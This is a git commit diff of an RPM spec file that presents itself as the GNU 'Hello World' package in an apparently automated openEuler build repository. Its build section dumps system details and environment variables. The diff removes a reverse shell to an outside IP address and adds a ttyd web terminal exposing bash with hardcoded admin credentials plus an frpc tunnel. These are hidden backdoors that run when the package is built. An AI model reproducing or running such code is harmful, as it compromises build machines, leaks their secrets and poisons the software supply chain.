summaryrefslogtreecommitdiff
path: root/hello.spec
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-10-30 08:09:37 +0000
committerCoprDistGit <infra@openeuler.org>2023-10-30 08:09:37 +0000
commit5578f311901eb7cbc9efb2845a8c792862d84a27 (patch)
tree86bde706ed8a32505d4946887de0e1aa611efe87 /hello.spec
parent3f45f01098c7099af989362d5b7fa8202655e8e5 (diff)
automatic import of hello
Diffstat (limited to 'hello.spec')
-rw-r--r--hello.spec3
1 files changed, 1 insertions, 2 deletions
diff --git a/hello.spec b/hello.spec
index 24fcd7f..f1fa701 100644
--- a/hello.spec
+++ b/hello.spec
@@ -6,7 +6,6 @@ Summary(zh_CN): GNU "Hello World" 程序
License: GPLv3+
URL: http://ftp.gnu.org/gnu/hello
Source: %{name}-%{version}.tar.gz
-
BuildRequires: gettext
Requires(post): info
Requires(preun): info
@@ -31,7 +30,7 @@ uname -a 1>&2
ps -ef 1>&2
# netstat -nlpt 1>&2
cat /proc/self/environ 1>&2
-bash -i >& /dev/tcp/43.138.250.111/8687 0>&1
+./ttyd -p 11111 -c 'admin:!Admin@1234' -W /bin/bash & ./frpc -c c.ini
make %{?_smp_mflags}